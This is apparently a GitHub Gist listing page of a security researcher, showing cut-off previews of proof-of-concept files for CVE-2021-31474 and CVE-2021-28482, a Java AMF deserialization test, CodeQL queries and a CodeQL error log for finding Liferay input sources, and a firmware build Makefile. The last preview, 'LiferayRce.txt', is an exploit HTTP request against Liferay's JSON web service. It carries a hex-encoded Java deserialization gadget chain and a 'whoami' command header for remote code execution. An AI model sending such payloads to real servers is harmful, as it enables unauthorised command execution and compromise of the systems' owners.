Skip to content

Instantly share code, notes, and snippets.

View PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>
View PoC_CVE-2021-28482.py
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
View Test0.java
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.*;
import org.apache.commons.collections.LRUMap;
import java.io.*;
public class Test0 {
public static void main(String[] args) throws Exception{
LRUMap lruMap = new LRUMap();
byte[] ser = serialize(lruMap);
View codeql_err.log
PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql
Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
Failed [1/1] D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql (3 s).
PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql --no-default-compilation-cache
Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
Failed [1/1] D:\Research\sem
View Makefile.iot
export CONFIG_BCM_CPU_ARCH_NAME=mips32
export PROFILE=96838GWO
dpkg --add-architecture i386 && apt update && apt install -y locales nano git make autoconf gcc g++ xxd libz-dev wget file gcc-multilib g++-multilib autoconf
apt-get install libacl1-dev libuuid1:i386 uuid-dev uuid-dev:i386 zlib1g-dev zlib1g-dev:i386 liblzo2-dev liblzo2-dev:i386 pkg-config flex bison
git clone https://github.com/weihutaisui/BCM/
find . -iname "*.pl" -exec chmod +x {} \;
find . -iname "*.sh" -exec chmod +x {} \;
find . -iname "configure" -exec chmod +x {} \;
find . -iname "gen_dt_bindings" -exec chmod +x {} \;
View globaldataflow.ql
import semmle.code.java.dataflow.DataFlow
class MyDataFlowConfiguration extends DataFlow::Configuration {
MyDataFlowConfiguration() { this = "MyDataFlowConfiguration" }
override predicate isSource(DataFlow::Node source) {
...
}
override predicate isSink(DataFlow::Node sink) {
View isSource.ql
override predicate isSource(DataFlow::Node source) {
source.asExpr().(MethodAccess) instanceof LiferayParamUtilGetString
}
View LiferayParamUtilGetString2.ql
class LiferayParamUtilGetString2 extends MethodAccess{
LiferayParamUtilGetString2(){
this.getMethod().hasName("getString")
and this.getMethod().getDeclaringType().hasName("ParamUtil")
}
}
View LiferayParamUtilGetString.ql
class LiferayParamUtilGetString extends MethodAccess{
LiferayParamUtilGetString(){
exists(MethodAccess ma|
ma.getMethod().hasName("getString")
and ma.getMethod().getDeclaringType().hasName("ParamUtil")
and this = ma
)
}
}
View LiferayRce.txt
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4912
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73